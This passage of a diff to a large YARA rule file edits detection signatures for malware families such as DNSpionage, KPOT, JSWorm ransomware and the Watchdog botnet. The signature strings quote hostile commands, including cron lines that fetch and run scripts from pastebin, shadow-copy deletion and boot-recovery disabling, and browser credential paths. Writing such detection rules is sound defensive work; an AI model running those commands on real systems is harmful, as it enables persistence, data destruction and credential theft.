 		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( ( 10 of ( $str* ) and $pipi ) or ( 10 of ( $str* ) and $pdb0 ) or ( 10 of ( $str* ) and 5 of ( $api* ) ) or ( all of them ) )
 }
-rule DEADBITS_Dnspionage : APT DNSCHANGER FILE
-{
-	meta:
-		description = "No description has been set in the source file - DeadBits"
-		author = "Adam Swanda"
-		id = "9f740645-60dc-5376-94ad-59d8efbf1942"
-		date = "2019-07-18"
-		modified = "2019-07-19"
-		reference = "https://github.com/deadbits/yara-rules"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/DNSpionage.yara#L1-L47"
-		license_url = "N/A"
-		logic_hash = "f20c71d0698d98cc58fa199c708ec7bf5cb0ec62503a20b532e752dab9aab920"
-		score = 75
-		quality = 78
-		tags = "APT, DNSCHANGER, FILE"
-		Description = "Attempts to detect DNSpionage PE samples"
-		Author = "Adam M. Swanda"
-
-	strings:
-		$x00 = "/Loginnn?id=" fullword ascii
-		$hdr0 = "Content-Disposition: fo" fullword ascii
-		$hdr1 = "Content-Type: multi" fullword ascii
-		$ua0 = "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" fullword ascii
-		$ua1 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" fullword ascii
-		$str0 = "send command result error! status code is: " fullword ascii
-		$str1 = "uploading command result form" fullword ascii
-		$str2 = "log.txt" fullword ascii
-		$str3 = "http host not found in config!" fullword ascii
-		$str4 = "send command result" fullword ascii
-		$str5 = "download error. status code: " fullword ascii
-		$str6 = "get command with dns" fullword ascii
-		$str7 = "dns host not found in config!" fullword ascii
-		$str8 = "command result is: " fullword ascii
-		$str9 = "command result size: " fullword ascii
-		$str10 = "connection type not found in config!" fullword ascii
-		$str11 = "commands: " fullword ascii
-		$str12 = "command is: " fullword ascii
-		$str13 = "port not found in config!" fullword ascii
-		$str14 = "download filename not found! " fullword ascii
-		$str15 = "base64 key not found in config!" fullword ascii
-		$str16 = "download filename is: " fullword ascii
-		$str17 = "config json is not valid" fullword ascii
-		$str18 = "config file will be changed from server!" fullword ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( ( 5 of ( $str* ) ) or ( $x00 and ( 1 of ( $hdr* ) ) and 1 of ( $ua* ) ) )
-}
-rule DEADBITS_Dacls_Trojan_Linux
-{
-	meta:
-		description = "No description has been set in the source file - DeadBits"
-		author = "Adam Swanda"
-		id = "bb83ba2b-70a3-5a0f-9588-d93b7f07f67f"
-		date = "2020-01-07"
-		modified = "2020-01-07"
-		reference = "https://github.com/deadbits/yara-rules"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/Dacls_Linux.yara#L1-L32"
-		license_url = "N/A"
-		logic_hash = "752d7daf9178e4fa20f2ce781c6ff70f83758f01479696f0808e1588da9a3d78"
-		score = 75
-		quality = 80
-		tags = ""
-		Author = "Adam M. Swanda"
-
-	strings:
-		$cls00 = "c_2910.cls" ascii fullword
-		$cls01 = "k_3872.cls" ascii fullword
-		$str00 = "{\"result\":\"ok\"}" ascii fullword
-		$str01 = "SCAN  %s  %d.%d.%d.%d %d" ascii fullword
-		$str02 = "/var/run/init.pid" ascii fullword
-		$str03 = "/flash/bin/mountd" ascii fullword
-		$str04 = "Name:" ascii fullword
-		$str05 = "Uid:" ascii fullword
-		$str06 = "Gid:" ascii fullword
-		$str08 = "PPid:" ascii fullword
-		$str09 = "session_id" ascii fullword
-
-	condition:
-		uint32be( 0x0 ) == 0x7f454c46 and ( ( all of ( $cls* ) ) or ( all of ( $str* ) ) )
-}
-rule DEADBITS_KPOT_V2 : WINMALWARE INFOSTEALER FILE
-{
-	meta:
-		description = "No description has been set in the source file - DeadBits"
-		author = "Adam Swanda"
-		id = "19e8d261-c658-5d0d-a95c-43fcaf2942e2"
-		date = "2019-08-05"
-		modified = "2019-08-05"
-		reference = "https://github.com/deadbits/yara-rules"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/KPOT_v2.yara#L1-L33"
-		license_url = "N/A"
-		logic_hash = "dc8cce2ae3a427f771b19b4d0e027b653ff03a7bf816303460398987535c5351"
-		score = 75
-		quality = 55
-		tags = "WINMALWARE, INFOSTEALER, FILE"
-		Description = "Attempts to detect KPOT version 2 payloads"
-		Author = "Adam M. Swanda"
-
-	strings:
-		$str01 = "%s: " ascii fullword
-		$str02 = " _%s_" ascii fullword
-		$str03 = "0|%S|%s|%s|%s" ascii fullword
-		$str04 = "%s | %02d/%04d | %s | %s | %s" ascii fullword
-		$str05 = "%s | %s | %s | %s | %s | %s | %s | %d | %s" ascii fullword
-		$str06 = "%s: %s | %02d/%04d | %s" ascii fullword
-		$str07 = "%s = %s" ascii fullword
-		$str08 = "password-check" ascii fullword
-		$conf_re1 = /(SMTP|POP3|IMAP)\sServer/ wide
-		$conf_re2 = /(SMTP|POP3|IMAP)\s(User|Password|Port)/ wide
-		$conf01 = "*.config" ascii wide fullword
-		$conf02 = "HTTP Server URL" ascii wide fullword
-		$conf03 = "%s: %d" ascii wide fullword
-		$conf04 = "%s\\Outlook.txt" ascii wide fullword
-
-	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $str* ) and all of ( $conf_re* ) and all of ( $conf0* )
-}
 rule DEADBITS_APT34_VALUEVAULT : APT34 INFOSTEALER WINMALWARE FILE
 {
 	meta:
@@ -69617,148 +69637,113 @@ rule DEADBITS_APT34_VALUEVAULT : APT34 INFOSTEALER WINMALWARE FILE
 		$str11 = "main.getHistory" ascii fullword
 		$str12 = "main.getHistoryWithPowerShell" ascii fullword
 		$str13 = "main.getHistoryFromRegistery" ascii fullword
-		$str14 = "main.main" ascii fullword
-		$str15 = "main.DecryptAESFromBase64" ascii fullword
-		$str16 = "main.DecryptAES" ascii fullword
-		$str17 = "main.CrackMozila" ascii fullword
-		$str18 = "main.decodeLoginData" ascii fullword
-		$str19 = "main.decrypt" ascii fullword
-		$str20 = "main.removePadding" ascii fullword
-		$str21 = "main.getLoginData" ascii fullword
-		$str22 = "main.isMasterPasswordCorrect" ascii fullword
-		$str23 = "main.decrypt3DES" ascii fullword
-		$str24 = "main.getKey" ascii fullword
-		$str25 = "main.manageMasterPassword" ascii fullword
-		$str26 = "main.getFirefoxProfiles" ascii fullword
-		$str27 = "main._Cfunc_DumpVault" ascii fullword
-		$str28 = "main.CrackIEandEdgeNew" ascii fullword
-		$str29 = "main.init.ializers" ascii fullword
-		$str30 = "main.init" ascii fullword
-
-	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 10 of ( $str* ) and 3 of ( $gopath* ) ) or ( $fsociety and $powershell and $gobuild ) or ( $fsociety and 10 of ( $str* ) ) )
-}
-rule DEADBITS_Avemaria_Warzone : AVEMARIA WARZONE WINMALWARE INFOSTEALER FILE
-{
-	meta:
-		description = "No description has been set in the source file - DeadBits"
-		author = "Adam Swanda"
-		id = "1e03927b-d59c-5e1f-bdee-e44dfb172fad"
-		date = "2019-07-18"
-		modified = "2019-08-08"
-		reference = "https://github.com/deadbits/yara-rules"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/avemaria_warzone.yara#L1-L32"
-		license_url = "N/A"
-		logic_hash = "1fe55fc8ea80616b11757193c2c74b9cf577ab661ddca4c6c64cfad63a300614"
-		score = 75
-		quality = 80
-		tags = "AVEMARIA, WARZONE, WINMALWARE, INFOSTEALER, FILE"
-		Author = "Adam M. Swanda"
-
-	strings:
-		$str1 = "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q " ascii fullword
-		$str2 = "MsgBox.exe" wide fullword
-		$str4 = "\\System32\\cmd.exe" wide fullword
-		$str6 = "Ave_Maria" wide
-		$str7 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" ascii fullword
-		$str8 = "SMTP Password" wide fullword
-		$str11 = "\\Google\\Chrome\\User Data\\Default\\Login Data" wide fullword
-		$str12 = "\\sqlmap.dll" wide fullword
-		$str14 = "SELECT * FROM logins" ascii fullword
-		$str16 = "Elevation:Administrator!new" wide
-		$str17 = "/n:%temp%" ascii wide
+		$str14 = "main.main" ascii fullword
+		$str15 = "main.DecryptAESFromBase64" ascii fullword
+		$str16 = "main.DecryptAES" ascii fullword
+		$str17 = "main.CrackMozila" ascii fullword
+		$str18 = "main.decodeLoginData" ascii fullword
+		$str19 = "main.decrypt" ascii fullword
+		$str20 = "main.removePadding" ascii fullword
+		$str21 = "main.getLoginData" ascii fullword
+		$str22 = "main.isMasterPasswordCorrect" ascii fullword
+		$str23 = "main.decrypt3DES" ascii fullword
+		$str24 = "main.getKey" ascii fullword
+		$str25 = "main.manageMasterPassword" ascii fullword
+		$str26 = "main.getFirefoxProfiles" ascii fullword
+		$str27 = "main._Cfunc_DumpVault" ascii fullword
+		$str28 = "main.CrackIEandEdgeNew" ascii fullword
+		$str29 = "main.init.ializers" ascii fullword
+		$str30 = "main.init" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB ) and ( 5 of ( $str* ) or all of them )
+		uint16( 0 ) == 0x5a4d and ( ( 10 of ( $str* ) and 3 of ( $gopath* ) ) or ( $fsociety and $powershell and $gobuild ) or ( $fsociety and 10 of ( $str* ) ) )
 }
-rule DEADBITS_Dacls_Trojan_Windows : FILE
+rule DEADBITS_Watchdog_Botnet : BOTNET LINUXMALWARE EXPLOITATION CVE_2019_11581 CVE_2019_10149
 {
 	meta:
 		description = "No description has been set in the source file - DeadBits"
 		author = "Adam Swanda"
-		id = "424b2c0d-2373-5a72-9a97-52b4bfc5cdcf"
-		date = "2020-01-07"
-		modified = "2020-01-07"
-		reference = "https://github.com/deadbits/yara-rules"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/Dacls_Windows.yara#L1-L30"
+		id = "ae95f934-2a9b-5c65-a11f-ea946d7f1bc6"
+		date = "2019-07-22"
+		modified = "2019-07-22"
+		reference = "https://twitter.com/polarply/status/1153232987762376704"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/WatchBog_Linux.yara#L1-L100"
 		license_url = "N/A"
-		logic_hash = "b77df7e3be9c264d6a63d40dbf49c41e9dd55b4e570c063b5710b849c36cc166"
+		logic_hash = "aea8afdf118b79f701941ddd4306ee0f1c947ea59de5485ff977beff95e06d35"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 53
+		tags = "BOTNET, LINUXMALWARE, EXPLOITATION, CVE_2019_11581, CVE_2019_10149"
 		Author = "Adam M. Swanda"
 
 	strings:
-		$fext00 = ".exe" ascii wide
-		$fext01 = ".cmd" ascii wide
-		$fext02 = ".bat" ascii wide
-		$fext03 = ".com" ascii wide
-		$str00 = "Software\\mthjk" ascii wide
-		$str01 = "WindowsNT.dll" ascii fullword
-		$str02 = "GET %s HTTP/1.1" ascii fullword
-		$str03 = "content-length:" ascii fullword
-		$str04 = "Connection: keep-alive" ascii fullword
-		$cls00 = "c_2910.cls" ascii fullword
-		$cls01 = "k_3872.cls" ascii fullword
+		$py0 = "libpython" ascii
+		$str0 = "*/3 * * * * root wget -q -O- https://pastebin.com/raw/" ascii
+		$str1 = "*/1 * * * * root curl -fsSL https://pastebin.com/raw/" ascii
+		$str6 = "onion.to"
+		$str7 = /https?:\/\/pastebin.com\/raw/ nocase
+		$str8 = "http://icanhazip.com/"
+		$str9 = "http://ident.me/"
+		$scan0 = "Scan_run"
+		$scan1 = "scan_nexus"
+		$scan2 = "scan_couchdb"
+		$scan3 = "scan_jenkins"
+		$scan4 = "scan_laravel"
+		$scan5 = "scan_redis"
+		$exploit01 = "CVE_2015_4335"
+		$exploit02 = "CVE_2018_1000861"
+		$exploit03 = "CVE_2018_8007"
+		$exploit04 = "CVE_2019_1014"
+		$exploit05 = "CVE_2019_11581"
+		$exploit06 = "CVE_2019_7238"
+		$pwn0 = "pwn_couchdb"
+		$pwn1 = "pwn_jenkins"
+		$pwn2 = "pwn_jira"
+		$pwn3 = "pwn_nexus"
+		$pwn4 = "pwn_redis"
+		$pwn5 = "pwn_exim"
+		$payload = /payload(s)/ nocase
+		$jira_token = "atlassian.xsrf.token=%s" ascii fullword
+		$jira_cmd = "set ($cmd=\"%s\")" ascii fullword
+		$jira_id = "JSESSIONID=%s" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d ) and ( ( all of ( $cls* ) ) or ( all of ( $fext* ) and all of ( $str* ) ) )
+		uint32be( 0x0 ) == 0x7f454c46 and $py0 and ( ( all of ( $pwn* ) and all of ( $scan* ) ) or ( $payload and all of ( $jira* ) and 5 of ( $str* ) ) or ( all of ( $str* ) and all of ( $exploit* ) ) )
 }
-rule DEADBITS_Silenttrinity : FILE
+rule DEADBITS_Jsworm : MALWARE FILE
 {
 	meta:
 		description = "No description has been set in the source file - DeadBits"
 		author = "Adam Swanda"
-		id = "40f9174c-e9a5-5453-b5fa-6c01c46daffa"
-		date = "2019-07-19"
-		modified = "2019-07-19"
-		reference = "https://countercept.com/blog/hunting-for-silenttrinity/"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/SilentTrinity_Payload.yara#L1-L55"
+		id = "6d452d04-b475-5241-890c-68119a7a8691"
+		date = "2019-09-06"
+		modified = "2019-09-06"
+		reference = "https://github.com/deadbits/yara-rules/"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/JSWorm.yara#L1-L38"
 		license_url = "N/A"
-		logic_hash = "7fd1775aadfccfdf141c0721f557e6c54b058ac17a59a8e4561dd62ab4a1eff3"
+		logic_hash = "99074e25ec15c5b25fa41bef19203f5ddc227acd51fadca1e2c3ece538b3da01"
 		score = 75
 		quality = 78
-		tags = "FILE"
-		Description = "Attempts to detect the SilentTrinity malware family"
-		Author = "Adam M. Swanda"
+		tags = "MALWARE, FILE"
 
 	strings:
-		$pdb01 = "SILENTTRINITY.pdb" ascii
-		$str01 = "Found {0} in zip" ascii fullword
-		$str02 = "{0} not in zip file" ascii fullword
-		$str03 = "Invalid HMAC: {0}" ascii fullword
-		$str04 = "Attempting HTTP GET to {0}" ascii fullword
-		$str05 = "Downloaded {0} bytes" ascii fullword
-		$str06 = "Error downloading {0}: {1}" ascii fullword
-		$str07 = "Attempting HTTP POST to {0}" ascii fullword
-		$str08 = "POST" ascii fullword
-		$str09 = "application/octet-stream" ascii fullword
-		$str10 = "Error sending job results to {0}: {1}" ascii fullword
-		$str11 = ".dll" ascii fullword
-		$str12 = "Trying to resolve assemblies by staging zip" ascii fullword
-		$str13 = "'{0}' loaded" ascii fullword
-		$str14 = "Usage: SILENTTRINITY.exe <URL> [<STAGE_URL>]" ascii fullword
-		$str15 = "IronPython.dll" ascii fullword
-		$str16 = "IronPythonDLL" ascii fullword
-		$str17 = "DEBUG" ascii fullword
-		$str18 = "Main.py" ascii fullword
-		$str19 = "Execute" ascii fullword
-		$str20 = "SILENTTRINITY.Properties.Resources" ascii fullword
-		$str21 = ".zip" ascii fullword
-		$a00 = "HttpGet" ascii fullword
-		$a01 = "System.Net" ascii fullword
-		$a02 = "Target" ascii fullword
-		$a03 = "WebClient" ascii fullword
-		$a04 = "get_Current" ascii fullword
-		$a05 = "Endpoint" ascii fullword
-		$a06 = "AesDecrypt" ascii fullword
-		$a07 = "AesEncrypt" ascii fullword
-		$a08 = "cert" ascii fullword
-		$a09 = "WebRequest" ascii fullword
-		$a10 = "HttpPost" ascii fullword
+		$name00 = "JSWORM" nocase
+		$str00 = "DECRYPT.txt" nocase
+		$str02 = "cmd.exe"
+		$str03 = "/c reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\"
+		$str04 = /\/c taskkill.exe taskkill \/f \/im (store|sqlserver|dns|sqlwriter)\.exe/
+		$str05 = "/c start C:\\ProgramData\\"
+		$str06 = "/c vssadmin.exe delete shadows /all /quiet"
+		$str07 = "/c bcdedit /set {default} bootstatuspolicy ignoreallfailures -y"
+		$str08 = "/c bcdedit /set {default} recoveryenabled No -y"
+		$str09 = "/c wbadmin delete catalog -quiet"
+		$str10 = "/c wmic shadowcopy delete -y"
+		$uniq00 = "fuckav"
+		$uniq01 = "DECRYPT.hta" nocase
+		$uniq02 = "Backup e-mail for contact :"
+		$uniq03 = "<HTA:APPLICATION APPLICATIONNAME=" nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 8 of ( $str* ) or ( all of ( $a* ) and $pdb01 ) or $pdb01 ) )
+		uint16( 0 ) == 0x5a4d and ( ( $name00 and 5 of ( $str* ) ) or ( 5 of ( $str* ) and 2 of ( $uniq* ) ) or ( $name00 and any of ( $uniq* ) ) )
 }
 rule DEADBITS_Crescentcore_DMG : INSTALLER MACOSMALWARE FILE
 {
@@ -69773,7 +69758,7 @@ rule DEADBITS_Crescentcore_DMG : INSTALLER MACOSMALWARE FILE
 		license_url = "N/A"
 		logic_hash = "819f01fdacea1e95f0f4d4f8e59ebae97ff9489a1be2c60e33253580a8f9e418"
 		score = 75
-		quality = 26
+		quality = 51
 		tags = "INSTALLER, MACOSMALWARE, FILE"
 		Author = "Adam M. Swanda"
 
@@ -69806,7 +69791,7 @@ rule DEADBITS_Acbackdoor_ELF : LINUX MALWARE BACKDOOR
 		description = "No description has been set in the source file - DeadBits"
 		author = "Adam M. Swanda"
 		id = "82eb41bf-cd1d-5b00-973b-31a79c75cfc0"
-		date = "2019-11-22"
+		date = "2019-11-01"
 		modified = "2019-12-04"
 		reference = "https://www.intezer.com/blog-acbackdoor-analysis-of-a-new-multiplatform-backdoor/"
 		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/ACBackdoor_Linux.yara#L1-L41"
@@ -69840,182 +69825,47 @@ rule DEADBITS_Acbackdoor_ELF : LINUX MALWARE BACKDOOR
 	condition:
 		( uint32be( 0x0 ) == 0x7f454c46 ) and ( ( $ua_str and all of ( $header* ) and $initd and all of ( $rcd* ) ) or ( $ua_str and all of ( $header* ) and 10 of ( $str* ) ) )
 }
-rule DEADBITS_Godlua_Linux : LINUXMALWARE FILE
-{
-	meta:
-		description = "No description has been set in the source file - DeadBits"
-		author = "Adam Swanda"
-		id = "1a05c88a-8199-5c6d-9352-9ef60df40078"
-		date = "2019-07-18"
-		modified = "2019-07-22"
-		reference = "https://github.com/deadbits/yara-rules"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/godlua_linux.yara#L1-L57"
-		license_url = "N/A"
-		logic_hash = "70a8078f261648f050807e82009493e39fa32c0748576b3df76d8aaaa117103e"
-		score = 75
-		quality = 26
-		tags = "LINUXMALWARE, FILE"
-		Author = "Adam M. Swanda"
-
-	strings:
-		$tmp0 = "/tmp" ascii fullword
-		$tmp1 = "TMPDIR" ascii
-		$str1 = "\"description\": \"" ascii fullword
-		$str2 = "searchers" ascii fullword
-		$str3 = "/dev/misc/watchdog" ascii fullword
-		$str4 = "/dev/wdt" ascii fullword
-		$str5 = "/dev/misc/wdt"
-		$str6 = "lcurl.safe" ascii fullword
-		$str7 = "luachild" ascii fullword
-		$str8 = "cjson.safe" ascii fullword
-		$str9 = "HostUrl" ascii fullword
-		$str10 = "HostConnect" ascii fullword
-		$str11 = "LUABOX" ascii fullword
-		$str12 = "Infinity" ascii fullword
-		$str13 = "/bin/sh" ascii fullword
-		$str14 = /\.onion(\.)?/ ascii fullword
-		$str15 = "/etc/resolv.conf" ascii fullword
-		$str16 = "hosts:" ascii fullword
-		$resolvers = /([0-9]{1,3}\.){3}[0-9]{1,3}:53,([0-9]{1,3}\.){3}[0-9]{1,3},([0-9]{1,3}\.){3}[0-9]{1,3}:5353,([0-9]{1,3}\.){3}[0-9]{1,3}:443/ ascii
-		$identifier0 = "$LuaVersion: God " ascii
-		$identifier1 = /fbi\/d\.\/d.\/d/ ascii
-		$identifier2 = "Copyright (C) FBI Systems, 2012-2019, https://fbi.gov" fullword ascii
-		$identifier3 = "God 5.1"
-
-	condition:
-		uint16( 0 ) == 0x457f and ( all of them or ( any of ( $identifier* ) and $resolvers and any of ( $tmp* ) and 4 of ( $str* ) ) or ( any of ( $identifier* ) and any of ( $tmp* ) and 4 of ( $str* ) ) )
-}
-rule DEADBITS_Jsworm : MALWARE FILE
-{
-	meta:
-		description = "No description has been set in the source file - DeadBits"
-		author = "Adam Swanda"
-		id = "6d452d04-b475-5241-890c-68119a7a8691"
-		date = "2019-09-06"
-		modified = "2019-09-06"
-		reference = "https://github.com/deadbits/yara-rules/"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/JSWorm.yara#L1-L38"
-		license_url = "N/A"
-		logic_hash = "99074e25ec15c5b25fa41bef19203f5ddc227acd51fadca1e2c3ece538b3da01"
-		score = 75
-		quality = 53
-		tags = "MALWARE, FILE"
-
-	strings:
-		$name00 = "JSWORM" nocase
-		$str00 = "DECRYPT.txt" nocase
-		$str02 = "cmd.exe"
-		$str03 = "/c reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\"
-		$str04 = /\/c taskkill.exe taskkill \/f \/im (store|sqlserver|dns|sqlwriter)\.exe/
-		$str05 = "/c start C:\\ProgramData\\"
-		$str06 = "/c vssadmin.exe delete shadows /all /quiet"
-		$str07 = "/c bcdedit /set {default} bootstatuspolicy ignoreallfailures -y"
-		$str08 = "/c bcdedit /set {default} recoveryenabled No -y"
-		$str09 = "/c wbadmin delete catalog -quiet"
-		$str10 = "/c wmic shadowcopy delete -y"
-		$uniq00 = "fuckav"
-		$uniq01 = "DECRYPT.hta" nocase
-		$uniq02 = "Backup e-mail for contact :"
-		$uniq03 = "<HTA:APPLICATION APPLICATIONNAME=" nocase
-
-	condition:
-		uint16( 0 ) == 0x5a4d and ( ( $name00 and 5 of ( $str* ) ) or ( 5 of ( $str* ) and 2 of ( $uniq* ) ) or ( $name00 and any of ( $uniq* ) ) )
-}
-rule DEADBITS_Watchdog_Botnet : BOTNET LINUXMALWARE EXPLOITATION CVE_2019_11581 CVE_2019_10149
+rule DEADBITS_Redghost_Linux : POSTEXPLOITATION LINUXMALWARE
 {
 	meta:
 		description = "No description has been set in the source file - DeadBits"
 		author = "Adam Swanda"
-		id = "ae95f934-2a9b-5c65-a11f-ea946d7f1bc6"
-		date = "2019-07-22"
-		modified = "2019-07-22"
-		reference = "https://twitter.com/polarply/status/1153232987762376704"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/WatchBog_Linux.yara#L1-L100"
+		id = "f598e115-f821-5932-aa14-5254bf28092c"
+		date = "2019-08-07"
+		modified = "2019-08-08"
+		reference = "https://github.com/d4rk007/RedGhost/"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/RedGhost_Linux.yara#L1-L45"
 		license_url = "N/A"
-		logic_hash = "aea8afdf118b79f701941ddd4306ee0f1c947ea59de5485ff977beff95e06d35"
+		logic_hash = "0b12a0eda0a3b65c3da787770afb010eb5cd36426d41c04aca862ae1b01ab770"
 		score = 75
-		quality = 53
-		tags = "BOTNET, LINUXMALWARE, EXPLOITATION, CVE_2019_11581, CVE_2019_10149"
+		quality = 80
+		tags = "POSTEXPLOITATION, LINUXMALWARE"
 		Author = "Adam M. Swanda"
 
 	strings:
-		$py0 = "libpython" ascii
-		$str0 = "*/3 * * * * root wget -q -O- https://pastebin.com/raw/" ascii
-		$str1 = "*/1 * * * * root curl -fsSL https://pastebin.com/raw/" ascii
-		$str6 = "onion.to"
-		$str7 = /https?:\/\/pastebin.com\/raw/ nocase
-		$str8 = "http://icanhazip.com/"
-		$str9 = "http://ident.me/"
-		$scan0 = "Scan_run"
-		$scan1 = "scan_nexus"
-		$scan2 = "scan_couchdb"
-		$scan3 = "scan_jenkins"
-		$scan4 = "scan_laravel"
-		$scan5 = "scan_redis"
-		$exploit01 = "CVE_2015_4335"
-		$exploit02 = "CVE_2018_1000861"
-		$exploit03 = "CVE_2018_8007"
-		$exploit04 = "CVE_2019_1014"
-		$exploit05 = "CVE_2019_11581"
-		$exploit06 = "CVE_2019_7238"
-		$pwn0 = "pwn_couchdb"
-		$pwn1 = "pwn_jenkins"
-		$pwn2 = "pwn_jira"
-		$pwn3 = "pwn_nexus"
-		$pwn4 = "pwn_redis"
-		$pwn5 = "pwn_exim"
-		$payload = /payload(s)/ nocase
-		$jira_token = "atlassian.xsrf.token=%s" ascii fullword
-		$jira_cmd = "set ($cmd=\"%s\")" ascii fullword
-		$jira_id = "JSESSIONID=%s" ascii fullword
-
-	condition:
-		uint32be( 0x0 ) == 0x7f454c46 and $py0 and ( ( all of ( $pwn* ) and all of ( $scan* ) ) or ( $payload and all of ( $jira* ) and 5 of ( $str* ) ) or ( all of ( $str* ) and all of ( $exploit* ) ) )
-}
-rule DEADBITS_APT34_LONGWATCH : APT34 WINMALWARE KEYLOGGER FILE
-{
-	meta:
-		description = "No description has been set in the source file - DeadBits"
-		author = "Adam Swanda"
-		id = "74a6a408-2f0e-567d-8968-c304d258df81"
-		date = "2019-07-22"
-		modified = "2019-07-22"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/APT34_LONGWATCH.yara#L1-L43"
-		license_url = "N/A"
-		logic_hash = "8f9ed228325800baea3a2874c71337709c04d93419d4d56821a791dbce6f4582"
-		score = 75
-		quality = 78
-		tags = "APT34, WINMALWARE, KEYLOGGER, FILE"
-		Description = "APT34 Keylogger"
-
-	strings:
-		$log = "c:\\windows\\temp\\log.txt" ascii fullword
-		$clipboard = "---------------CLIPBOARD------------" ascii fullword
-		$func0 = "\"Main Invoked.\"" ascii fullword
-		$func1 = "\"Main Returned.\"" ascii fullword
-		$logger3 = ">---------------------------------------------------" ascii fullword
-		$logger4 = "[ENTER]" ascii fullword
-		$logger5 = "[CapsLock]" ascii fullword
-		$logger6 = "[CRTL]" ascii fullword
-		$logger7 = "[PAGE_UP]" ascii fullword
-		$logger8 = "[PAGE_DOWN]" ascii fullword
-		$logger9 = "[HOME]" ascii fullword
-		$logger10 = "[LEFT]" ascii fullword
-		$logger11 = "[RIGHT]" ascii fullword
-		$logger12 = "[DOWN]" ascii fullword
-		$logger13 = "[PRINT]" ascii fullword
-		$logger14 = "[PRINT SCREEN]" ascii fullword
-		$logger15 = "[INSERT]" ascii fullword
-		$logger16 = "[SLEEP]" ascii fullword
-		$logger17 = "[PAUSE]" ascii fullword
-		$logger18 = "[TAB]" ascii fullword
-		$logger19 = "[ESC]" ascii fullword
-		$logger20 = "[DEL]" ascii fullword
-		$logger21 = "[ALT]" ascii fullword
+		$name = "[ R E D G H O S T - P O S T  E X P L O I T - T O O L]" ascii
+		$feature0 = "Payloads" ascii
+		$feature1 = "SudoInject" ascii
+		$feature2 = "lsInject" ascii
+		$feature3 = "Crontab" ascii
+		$feature4 = "GetRoot" ascii
+		$feature5 = "Clearlogs" ascii
+		$feature6 = "MassinfoGrab" ascii
+		$feature7 = "CheckVM" ascii
+		$feature8 = "MemoryExec" ascii
+		$feature9 = "BanIP" ascii
+		$func0 = "checkVM(){" ascii
+		$func1 = "memoryexec(){" ascii
+		$func2 = "banip(){" ascii
+		$func3 = "linprivesc(){" ascii
+		$func4 = "dirty(){" ascii
+		$func5 = "Ocr(){" ascii
+		$func6 = "clearlog(){" ascii
+		$func7 = "conmethods(){" ascii
+		$func8 = "add2sys(){" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $log and all of ( $func* ) and all of ( $logger* ) and $clipboard
+		( uint16be( 0x0 ) == 0x2321 and for any i in ( 0 .. 64 ) : ( uint16be( i ) == 0x2f62 and uint8( i + 2 ) == 0x68 ) ) and ( $name or 5 of them )
 }
 rule DEADBITS_APT32_Ratsnif : APT32 TROJAN WINMALWARE FILE
 {
@@ -70083,83 +69933,180 @@ rule DEADBITS_APT32_Ratsnif : APT32 TROJAN WINMALWARE FILE
 	condition:
 		( uint16( 0 ) == 0x5a4d ) and ( ( 10 of ( $str* ) and 3 of ( $cnc* ) ) or ( 3 of ( $cnc* ) and $pdb0 ) )
 }
-rule DEADBITS_Silenttrinity_Delivery_Document : FILE
+rule DEADBITS_Dnspionage : APT DNSCHANGER FILE
 {
 	meta:
 		description = "No description has been set in the source file - DeadBits"
 		author = "Adam Swanda"
-		id = "be8cf8b7-d7f8-587d-b7bd-ad10796cda7c"
+		id = "9f740645-60dc-5376-94ad-59d8efbf1942"
+		date = "2019-07-18"
+		modified = "2019-07-19"
+		reference = "https://github.com/deadbits/yara-rules"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/DNSpionage.yara#L1-L47"
+		license_url = "N/A"
+		logic_hash = "f20c71d0698d98cc58fa199c708ec7bf5cb0ec62503a20b532e752dab9aab920"
